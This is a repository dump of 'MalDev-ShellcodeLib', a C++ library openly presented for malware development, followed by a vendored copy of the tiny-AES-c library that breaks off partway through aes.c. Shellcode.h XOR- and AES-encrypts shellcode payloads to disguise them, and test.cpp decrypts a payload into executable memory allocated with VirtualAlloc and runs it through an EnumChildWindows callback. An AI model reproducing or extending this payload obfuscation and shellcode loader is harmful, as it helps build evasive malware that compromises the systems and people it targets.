├── README.md └── lib-Shellcode ├── Shellcode.h ├── encrypt.exe ├── test.cpp ├── tiny-AES-c ├── CMakeLists.txt ├── Makefile ├── README.md ├── aes.c ├── aes.h ├── aes.hpp ├── conanfile.py ├── library.json ├── library.properties ├── test.c ├── test.cpp ├── test_package │ ├── CMakeLists.txt │ └── conanfile.py └── unlicense.txt └── user.exe /README.md: -------------------------------------------------------------------------------- 1 | # MalDev-ShellcodeLib 2 | Malware Library focused in Shellcode and Payloads used by Malware Development, actually you can encrypt and decrypt the payload shellcode with XOR ciphertext 3 | 4 | # Code 5 | This is a C++ code defining a class Shellcode. The class has a public member variable payload which is a pointer to an array of unsigned char, a public member variable len which is an integer and various public member functions. 6 | 7 | The constructor Shellcode(unsigned char *shellcode, int len) initializes the class and accepts an array of unsigned char and an integer len as inputs. It sets this->len to len and dynamically allocates memory for payload to store len number of characters. The constructor also copies the elements from shellcode to this->payload. 8 | 9 | The function getShellcode() returns the value of the payload member variable. The function getLen() returns the value of the len member variable. 10 | 11 | The function XOR_decrypt(unsigned char key) performs XOR decryption on the payload using the input key and outputs the result in hexadecimal format. 12 | 13 | The function XOR_encrypt(unsigned char key) performs XOR encryption on the payload using the input key and outputs the result in hexadecimal format. 14 | 15 | ![image](https://user-images.githubusercontent.com/79543461/217566774-ef538157-e349-49de-a9c6-ee8e13245eb8.png) 16 | 17 | # Usage 18 | To use this library you can do the links like this: 19 | 20 | First of all its create the object sending de payload and the payload lenght. 21 | 22 | ![image](https://user-images.githubusercontent.com/79543461/217568181-b8a1d129-cd7a-4aac-abd7-924e285ac575.png) 23 | 24 | With this done, you can use encrypt and decrypt the shellcode with this code... 25 | 26 | ![image](https://user-images.githubusercontent.com/79543461/217568886-cd48441a-21b1-424b-9368-e8ddcb46b5d0.png) 27 | 28 | -------------------------------------------------------------------------------- /lib-Shellcode/Shellcode.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "tiny-AES-c/aes.c" 6 | 7 | using namespace std; 8 | 9 | class Shellcode{ 10 | 11 | public: 12 | unsigned char *payload; 13 | int len; 14 | 15 | Shellcode(unsigned char *shellcode, int len){ 16 | this->len = len; 17 | payload = new unsigned char[len]; 18 | for (int i = 0; i < len; i++) { 19 | this->payload[i] = shellcode[i]; 20 | } 21 | } 22 | //setters 23 | void setLen(int len){ 24 | this->len = len; 25 | } 26 | 27 | 28 | unsigned char *getShellcode(){ 29 | return payload; 30 | } 31 | 32 | int getLen(){ 33 | return len; 34 | } 35 | 36 | unsigned char * XOR_decrypt(unsigned char key) { 37 | for (int i = 0; i < len; i++) { 38 | payload[i] = payload[i] ^ key; 39 | cout << "\\x" << hex << setfill('0') << setw(2) << (int)payload[i]; 40 | } 41 | cout << endl; 42 | return payload; 43 | } 44 | 45 | 46 | void XOR_encrypt(unsigned char key){ 47 | for(int i = 0; i < len; i++){ 48 | payload[i] ^= key; 49 | } 50 | for(int i = 0; i < len; i++){ 51 | cout << "\\x" << hex << (int)payload[i]; 52 | } 53 | cout << endl; 54 | } 55 | 56 | 57 | 58 | void AES_encrypt(unsigned char key[],unsigned char iv[]){ 59 | // encrypt the shellcode, and print it out, add last byte a x90 to make it 16 bytes, append a /x90 to the end 60 | struct AES_ctx ctx; 61 | AES_init_ctx_iv(&ctx, key, iv); 62 | AES_CBC_encrypt_buffer(&ctx, this->getShellcode(), this->getLen()); 63 | 64 | this->setLen(this->getLen() + 1); 65 | this->getShellcode()[this->getLen() - 1] = 0x90; 66 | 67 | 68 | for(int i = 0; i < this->getLen(); i++){ 69 | printf("\\x%02x", this->getShellcode()[i]); 70 | } 71 | printf("\n"); 72 | getch(); 73 | 74 | } 75 | 76 | 77 | 78 | unsigned char* AES_decrypt(unsigned char key[],unsigned char iv[]){ 79 | //decrypt the shellcode, and print it out 80 | // the last byte is the padding, so we don't print it out 81 | //the last 16 are not decrypted 82 | struct AES_ctx ctx; 83 | AES_init_ctx_iv(&ctx, key, iv); 84 | AES_CBC_decrypt_buffer(&ctx, this->getShellcode(), this->getLen()); 85 | printf("\n"); 86 | getch(); 87 | return this->getShellcode(); 88 | } 89 | 90 | }; 91 | 92 | -------------------------------------------------------------------------------- /lib-Shellcode/encrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/MalDev-Lib/4741f706562ba3519dfb451053a57bfc3300974a/lib-Shellcode/encrypt.exe -------------------------------------------------------------------------------- /lib-Shellcode/test.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "Shellcode.h" 4 | 5 | int main(){ 6 | unsigned char shellcode[] = "\x45\x54\xf6\x42\x89\xee\xfa\xe2\xc\xa"; 7 | 8 | unsigned char key = 0x0A; 9 | int len = sizeof(shellcode); 10 | 11 | Shellcode sc(shellcode,len); 12 | 13 | unsigned char * decrypted = sc.XOR_decrypt(key); 14 | 15 | 16 | HANDLE hAlloc = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 17 | memcpy(hAlloc, decrypted, len); 18 | EnumChildWindows((HWND) NULL, (WNDENUMPROC) hAlloc, NULL); 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.12) 2 | 3 | project(tiny-aes C) 4 | 5 | add_library(${PROJECT_NAME} "") 6 | target_sources(${PROJECT_NAME} 7 | PRIVATE 8 | ${CMAKE_CURRENT_LIST_DIR}/aes.c 9 | INTERFACE 10 | ${CMAKE_CURRENT_LIST_DIR}/aes.h 11 | ${CMAKE_CURRENT_LIST_DIR}/aes.hpp 12 | ) 13 | 14 | target_include_directories(${PROJECT_NAME} 15 | INTERFACE 16 | ${CMAKE_CURRENT_LIST_DIR} 17 | ) 18 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/Makefile: -------------------------------------------------------------------------------- 1 | #CC = avr-gcc 2 | #CFLAGS = -Wall -mmcu=atmega16 -Os -Wl,-Map,test.map 3 | #OBJCOPY = avr-objcopy 4 | CC = gcc 5 | LD = gcc 6 | AR = ar 7 | ARFLAGS = rcs 8 | CFLAGS = -Wall -Os -c 9 | LDFLAGS = -Wall -Os -Wl,-Map,test.map 10 | ifdef AES192 11 | CFLAGS += -DAES192=1 12 | endif 13 | ifdef AES256 14 | CFLAGS += -DAES256=1 15 | endif 16 | 17 | OBJCOPYFLAGS = -j .text -O ihex 18 | OBJCOPY = objcopy 19 | 20 | # include path to AVR library 21 | INCLUDE_PATH = /usr/lib/avr/include 22 | # splint static check 23 | SPLINT = splint test.c aes.c -I$(INCLUDE_PATH) +charindex -unrecog 24 | 25 | default: test.elf 26 | 27 | .SILENT: 28 | .PHONY: lint clean 29 | 30 | test.hex : test.elf 31 | echo copy object-code to new image and format in hex 32 | $(OBJCOPY) ${OBJCOPYFLAGS} $< $@ 33 | 34 | test.o : test.c aes.h aes.o 35 | echo [CC] $@ $(CFLAGS) 36 | $(CC) $(CFLAGS) -o $@ $< 37 | 38 | aes.o : aes.c aes.h 39 | echo [CC] $@ $(CFLAGS) 40 | $(CC) $(CFLAGS) -o $@ $< 41 | 42 | test.elf : aes.o test.o 43 | echo [LD] $@ 44 | $(LD) $(LDFLAGS) -o $@ $^ 45 | 46 | aes.a : aes.o 47 | echo [AR] $@ 48 | $(AR) $(ARFLAGS) $@ $^ 49 | 50 | lib : aes.a 51 | 52 | clean: 53 | rm -f *.OBJ *.LST *.o *.gch *.out *.hex *.map *.elf *.a 54 | 55 | test: 56 | make clean && make && ./test.elf 57 | make clean && make AES192=1 && ./test.elf 58 | make clean && make AES256=1 && ./test.elf 59 | 60 | lint: 61 | $(call SPLINT) 62 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/README.md: -------------------------------------------------------------------------------- 1 | ![CI](https://github.com/kokke/tiny-AES-c/workflows/CI/badge.svg) 2 | ### Tiny AES in C 3 | 4 | This is a small and portable implementation of the AES [ECB](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_Codebook_.28ECB.29), [CTR](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_.28CTR.29) and [CBC](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29) encryption algorithms written in C. 5 | 6 | You can override the default key-size of 128 bit with 192 or 256 bit by defining the symbols AES192 or AES256 in [`aes.h`](https://github.com/kokke/tiny-AES-c/blob/master/aes.h). 7 | 8 | The API is very simple and looks like this (I am using C99 ``-style annotated types): 9 | 10 | ```C 11 | /* Initialize context calling one of: */ 12 | void AES_init_ctx(struct AES_ctx* ctx, const uint8_t* key); 13 | void AES_init_ctx_iv(struct AES_ctx* ctx, const uint8_t* key, const uint8_t* iv); 14 | 15 | /* ... or reset IV at random point: */ 16 | void AES_ctx_set_iv(struct AES_ctx* ctx, const uint8_t* iv); 17 | 18 | /* Then start encrypting and decrypting with the functions below: */ 19 | void AES_ECB_encrypt(const struct AES_ctx* ctx, uint8_t* buf); 20 | void AES_ECB_decrypt(const struct AES_ctx* ctx, uint8_t* buf); 21 | 22 | void AES_CBC_encrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 23 | void AES_CBC_decrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 24 | 25 | /* Same function for encrypting as for decrypting in CTR mode */ 26 | void AES_CTR_xcrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 27 | ``` 28 | 29 | Important notes: 30 | * No padding is provided so for CBC and ECB all buffers should be multiples of 16 bytes. For padding [PKCS7](https://en.wikipedia.org/wiki/Padding_(cryptography)#PKCS7) is recommendable. 31 | * ECB mode is considered unsafe for most uses and is not implemented in streaming mode. If you need this mode, call the function for every block of 16 bytes you need encrypted. See [wikipedia's article on ECB](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_Codebook_(ECB)) for more details. 32 | * This library is designed for small code size and simplicity, intended for cases where small binary size, low memory footprint and portability is more important than high performance. If speed is a concern, you can try more complex libraries, e.g. [Mbed TLS](https://tls.mbed.org/), [OpenSSL](https://www.openssl.org/) etc. 33 | 34 | You can choose to use any or all of the modes-of-operations, by defining the symbols CBC, CTR or ECB in [`aes.h`](https://github.com/kokke/tiny-AES-c/blob/master/aes.h) (read the comments for clarification). 35 | 36 | C++ users should `#include` [aes.hpp](https://github.com/kokke/tiny-AES-c/blob/master/aes.hpp) instead of [aes.h](https://github.com/kokke/tiny-AES-c/blob/master/aes.h) 37 | 38 | There is no built-in error checking or protection from out-of-bounds memory access errors as a result of malicious input. 39 | 40 | The module uses less than 200 bytes of RAM and 1-2K ROM when compiled for ARM, but YMMV depending on which modes are enabled. 41 | 42 | It is one of the smallest implementations in C I've seen yet, but do contact me if you know of something smaller (or have improvements to the code here). 43 | 44 | I've successfully used the code on 64bit x86, 32bit ARM and 8 bit AVR platforms. 45 | 46 | 47 | GCC size output when only CTR mode is compiled for ARM: 48 | 49 | $ arm-none-eabi-gcc -Os -DCBC=0 -DECB=0 -DCTR=1 -c aes.c 50 | $ size aes.o 51 | text data bss dec hex filename 52 | 1171 0 0 1171 493 aes.o 53 | 54 | .. and when compiling for the THUMB instruction set, we end up well below 1K in code size. 55 | 56 | $ arm-none-eabi-gcc -Os -mthumb -DCBC=0 -DECB=0 -DCTR=1 -c aes.c 57 | $ size aes.o 58 | text data bss dec hex filename 59 | 903 0 0 903 387 aes.o 60 | 61 | 62 | I am using the Free Software Foundation, ARM GCC compiler: 63 | 64 | $ arm-none-eabi-gcc --version 65 | arm-none-eabi-gcc (4.8.4-1+11-1) 4.8.4 20141219 (release) 66 | Copyright (C) 2013 Free Software Foundation, Inc. 67 | This is free software; see the source for copying conditions. There is NO 68 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 69 | 70 | 71 | 72 | 73 | This implementation is verified against the data in: 74 | 75 | [National Institute of Standards and Technology Special Publication 800-38A 2001 ED](http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38a.pdf) Appendix F: Example Vectors for Modes of Operation of the AES. 76 | 77 | The other appendices in the document are valuable for implementation details on e.g. padding, generation of IVs and nonces in CTR-mode etc. 78 | 79 | 80 | A heartfelt thank-you to [all the nice people](https://github.com/kokke/tiny-AES-c/graphs/contributors) out there who have contributed to this project. 81 | 82 | 83 | All material in this repository is in the public domain. 84 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/aes.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | This is an implementation of the AES algorithm, specifically ECB, CTR and CBC mode. 4 | Block size can be chosen in aes.h - available choices are AES128, AES192, AES256. 5 | 6 | The implementation is verified against the test vectors in: 7 | National Institute of Standards and Technology Special Publication 800-38A 2001 ED 8 | 9 | ECB-AES128 10 | ---------- 11 | 12 | plain-text: 13 | 6bc1bee22e409f96e93d7e117393172a 14 | ae2d8a571e03ac9c9eb76fac45af8e51 15 | 30c81c46a35ce411e5fbc1191a0a52ef 16 | f69f2445df4f9b17ad2b417be66c3710 17 | 18 | key: 19 | 2b7e151628aed2a6abf7158809cf4f3c 20 | 21 | resulting cipher 22 | 3ad77bb40d7a3660a89ecaf32466ef97 23 | f5d3d58503b9699de785895a96fdbaaf 24 | 43b1cd7f598ece23881b00e3ed030688 25 | 7b0c785e27e8ad3f8223207104725dd4 26 | 27 | 28 | NOTE: String length must be evenly divisible by 16byte (str_len % 16 == 0) 29 | You should pad the end of the string with zeros if this is not the case. 30 | For AES192/256 the key size is proportionally larger. 31 | 32 | */ 33 | 34 | 35 | /*****************************************************************************/ 36 | /* Includes: */ 37 | /*****************************************************************************/ 38 | #include // CBC mode, for memset 39 | #include "aes.h" 40 | 41 | /*****************************************************************************/ 42 | /* Defines: */ 43 | /*****************************************************************************/ 44 | // The number of columns comprising a state in AES. This is a constant in AES. Value=4 45 | #define Nb 4 46 | 47 | #if defined(AES256) && (AES256 == 1) 48 | #define Nk 8 49 | #define Nr 14 50 | #elif defined(AES192) && (AES192 == 1) 51 | #define Nk 6 52 | #define Nr 12 53 | #else 54 | #define Nk 4 // The number of 32 bit words in a key. 55 | #define Nr 10 // The number of rounds in AES Cipher. 56 | #endif 57 | 58 | // jcallan@github points out that declaring Multiply as a function 59 | // reduces code size considerably with the Keil ARM compiler. 60 | // See this link for more information: https://github.com/kokke/tiny-AES-C/pull/3 61 | #ifndef MULTIPLY_AS_A_FUNCTION 62 | #define MULTIPLY_AS_A_FUNCTION 0 63 | #endif 64 | 65 | 66 | 67 | 68 | /*****************************************************************************/ 69 | /* Private variables: */ 70 | /*****************************************************************************/ 71 | // state - array holding the intermediate results during decryption. 72 | typedef uint8_t state_t[4][4]; 73 | 74 | 75 | 76 | // The lookup-tables are marked const so they can be placed in read-only storage instead of RAM 77 | // The numbers below can be computed dynamically trading ROM for RAM - 78 | // This can be useful in (embedded) bootloader applications, where ROM is often limited. 79 | static const uint8_t sbox[256] = { 80 | //0 1 2 3 4 5 6 7 8 9 A B C D E F 81 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 82 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 83 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 84 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 85 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 86 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 87 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 88 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 89 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 90 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 91 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 92 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 93 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 94 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 95 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 96 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 }; 97 | 98 | #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) 99 | static const uint8_t rsbox[256] = { 100 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 101 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 102 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 103 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 104 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 105 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 106 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 107 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 108 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 109 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 110 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 111 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 112 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 113 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 114 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 115 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d }; 116 | #endif 117 | 118 | // The round constant word array, Rcon[i], contains the values given by 119 | // x to the power (i-1) being powers of x (x is denoted as {02}) in the field GF(2^8) 120 | static const uint8_t Rcon[11] = { 121 | 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36 }; 122 | 123 | /* 124 | * Jordan Goulder points out in PR #12 (https://github.com/kokke/tiny-AES-C/pull/12), 125 | * that you can remove most of the elements in the Rcon array, because they are unused. 126 | * 127 | * From Wikipedia's article on the Rijndael key schedule @ https://en.wikipedia.org/wiki/Rijndael_key_schedule#Rcon 128 | * 129 | * "Only the first some of these constants are actually used – up to rcon[10] for AES-128 (as 11 round keys are needed), 130 | * up to rcon[8] for AES-192, up to rcon[7] for AES-256. rcon[0] is not used in AES algorithm." 131 | */ 132 | 133 | 134 | /*****************************************************************************/ 135 | /* Private functions: */ 136 | /*****************************************************************************/ 137 | /* 138 | static uint8_t getSBoxValue(uint8_t num) 139 | { 140 | return sbox[num]; 141 | } 142 | */ 143 | #define getSBoxValue(num) (sbox[(num)]) 144 | 145 | // This function produces Nb(Nr+1) round keys. The round keys are used in each round to decrypt the states. 146 | static void KeyExpansion(uint8_t* RoundKey, const uint8_t* Key) 147 | { 148 | unsigned i, j, k; 149 | uint8_t tempa[4]; // Used for the column/row operations 150 | 151 | // The first round key is the key itself. 152 | for (i = 0; i < Nk; ++i) 153 | { 154 | RoundKey[(i * 4) + 0] = Key[(i * 4) + 0]; 155 | RoundKey[(i * 4) + 1] = Key[(i * 4) + 1]; 156 | RoundKey[(i * 4) + 2] = Key[(i * 4) + 2]; 157 | RoundKey[(i * 4) + 3] = Key[(i * 4) + 3]; 158 | } 159 | 160 | // All other round keys are found from the previous round keys. 161 | for (i = Nk; i < Nb * (Nr + 1); ++i) 162 | { 163 | { 164 | k = (i - 1) * 4; 165 | tempa[0]=RoundKey[k + 0]; 166 | tempa[1]=RoundKey[k + 1]; 167 | tempa[2]=RoundKey[k + 2]; 168 | tempa[3]=RoundKey[k + 3]; 169 | 170 | } 171 | 172 | if (i % Nk == 0) 173 | { 174 | // This function shifts the 4 bytes in a word to the left once. 175 | // [a0,a1,a2,a3] becomes [a1,a2,a3,a0] 176 | 177 | // Function RotWord() 178 | { 179 | const uint8_t u8tmp = tempa[0]; 180 | tempa[0] = tempa[1]; 181 | tempa[1] = tempa[2]; 182 | tempa[2] = tempa[3]; 183 | tempa[3] = u8tmp; 184 | } 185 | 186 | // SubWord() is a function that takes a four-byte input word and 187 | // applies the S-box to each of the four bytes to produce an output word. 188 | 189 | // Function Subword() 190 | { 191 | tempa[0] = getSBoxValue(tempa[0]); 192 | tempa[1] = getSBoxValue(tempa[1]); 193 | tempa[2] = getSBoxValue(tempa[2]); 194 | tempa[3] = getSBoxValue(tempa[3]); 195 | } 196 | 197 | tempa[0] = tempa[0] ^ Rcon[i/Nk]; 198 | } 199 | #if defined(AES256) && (AES256 == 1) 200 | if (i % Nk == 4) 201 | { 202 | // Function Subword() 203 | { 204 | tempa[0] = getSBoxValue(tempa[0]); 205 | tempa[1] = getSBoxValue(tempa[1]); 206 | tempa[2] = getSBoxValue(tempa[2]); 207 | tempa[3] = getSBoxValue(tempa[3]); 208 | } 209 | } 210 | #endif 211 | j = i * 4; k=(i - Nk) * 4; 212 | RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0]; 213 | RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1]; 214 | RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2]; 215 | RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3]; 216 | } 217 | } 218 | 219 | void AES_init_ctx(struct AES_ctx* ctx, const uint8_t* key) 220 | { 221 | KeyExpansion(ctx->RoundKey, key); 222 | } 223 | #if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1)) 224 | void AES_init_ctx_iv(struct AES_ctx* ctx, const uint8_t* key, const uint8_t* iv) 225 | { 226 | KeyExpansion(ctx->RoundKey, key); 227 | memcpy (ctx->Iv, iv, AES_BLOCKLEN); 228 | } 229 | void AES_ctx_set_iv(struct AES_ctx* ctx, const uint8_t* iv) 230 | { 231 | memcpy (ctx->Iv, iv, AES_BLOCKLEN); 232 | } 233 | #endif 234 | 235 | // This function adds the round key to state. 236 | // The round key is added to the state by an XOR function. 237 | static void AddRoundKey(uint8_t round, state_t* state, const uint8_t* RoundKey) 238 | { 239 | uint8_t i,j; 240 | for (i = 0; i < 4; ++i) 241 | { 242 | for (j = 0; j < 4; ++j) 243 | { 244 | (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j]; 245 | } 246 | } 247 | } 248 | 249 | // The SubBytes Function Substitutes the values in the 250 | // state matrix with values in an S-box. 251 | static void SubBytes(state_t* state) 252 | { 253 | uint8_t i, j; 254 | for (i = 0; i < 4; ++i) 255 | { 256 | for (j = 0; j < 4; ++j) 257 | { 258 | (*state)[j][i] = getSBoxValue((*state)[j][i]); 259 | } 260 | } 261 | } 262 | 263 | // The ShiftRows() function shifts the rows in the state to the left. 264 | // Each row is shifted with different offset. 265 | // Offset = Row number. So the first row is not shifted. 266 | static void ShiftRows(state_t* state) 267 | { 268 | uint8_t temp; 269 | 270 | // Rotate first row 1 columns to left 271 | temp = (*state)[0][1]; 272 | (*state)[0][1] = (*state)[1][1]; 273 | (*state)[1][1] = (*state)[2][1]; 274 | (*state)[2][1] = (*state)[3][1]; 275 | (*state)[3][1] = temp; 276 | 277 | // Rotate second row 2 columns to left 278 | temp = (*state)[0][2]; 279 | (*state)[0][2] = (*state)[2][2]; 280 | (*state)[2][2] = temp; 281 | 282 | temp = (*state)[1][2]; 283 | (*state)[1][2] = (*state)[3][2]; 284 | (*state)[3][2] = temp; 285 | 286 | // Rotate third row 3 columns to left 287 | temp = (*state)[0][3]; 288 | (*state)[0][3] = (*state)[3][3]; 289 | (*state)[3][3] = (*state)[2][3]; 290 | (*state)[2][3] = (*state)[1][3]; 291 | (*state)[1][3] = temp; 292 | } 293 | 294 | static uint8_t xtime(uint8_t x) 295 | { 296 | return ((x<<1) ^ (((x>>7) & 1) * 0x1b)); 297 | } 298 | 299 | // MixColumns function mixes the columns of the state matrix 300 | static void MixColumns(state_t* state) 301 | { 302 | uint8_t i; 303 | uint8_t Tmp, Tm, t; 304 | for (i = 0; i < 4; ++i) 305 | { 306 | t = (*state)[i][0]; 307 | Tmp = (*state)[i][0] ^ (*state)[i][1] ^ (*state)[i][2] ^ (*state)[i][3] ; 308 | Tm = (*state)[i][0] ^ (*state)[i][1] ; Tm = xtime(Tm); (*state)[i][0] ^= Tm ^ Tmp ; 309 | Tm = (*state)[i][1] ^ (*state)[i][2] ; Tm = xtime(Tm); (*state)[i][1] ^= Tm ^ Tmp ; 310 | Tm = (*state)[i][2] ^ (*state)[i][3] ; Tm = xtime(Tm); (*state)[i][2] ^= Tm ^ Tmp ; 311 | Tm = (*state)[i][3] ^ t ; Tm = xtime(Tm); (*state)[i][3] ^= Tm ^ Tmp ; 312 | } 313 | } 314 | 315 | // Multiply is used to multiply numbers in the field GF(2^8) 316 | // Note: The last call to xtime() is unneeded, but often ends up generating a smaller binary 317 | // The compiler seems to be able to vectorize the operation better this way. 318 | // See https://github.com/kokke/tiny-AES-c/pull/34 319 | #if MULTIPLY_AS_A_FUNCTION 320 | static uint8_t Multiply(uint8_t x, uint8_t y) 321 | { 322 | return (((y & 1) * x) ^ 323 | ((y>>1 & 1) * xtime(x)) ^ 324 | ((y>>2 & 1) * xtime(xtime(x))) ^ 325 | ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ 326 | ((y>>4 & 1) * xtime(xtime(xtime(xtime(x)))))); /* this last call to xtime() can be omitted */ 327 | } 328 | #else 329 | #define Multiply(x, y) \ 330 | ( ((y & 1) * x) ^ \ 331 | ((y>>1 & 1) * xtime(x)) ^ \ 332 | ((y>>2 & 1) * xtime(xtime(x))) ^ \ 333 | ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ \ 334 | ((y>>4 & 1) * xtime(xtime(xtime(xtime(x)))))) \ 335 | 336 | #endif 337 | 338 | #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) 339 | /* 340 | static uint8_t getSBoxInvert(uint8_t num) 341 | { 342 | return rsbox[num]; 343 | } 344 | */ 345 | #define getSBoxInvert(num) (rsbox[(num)]) 346 | 347 | // MixColumns function mixes the columns of the state matrix. 348 | // The method used to multiply may be difficult to understand for the inexperienced. 349 | // Please use the references to gain more information. 350 | static void InvMixColumns(state_t* state) 351 | { 352 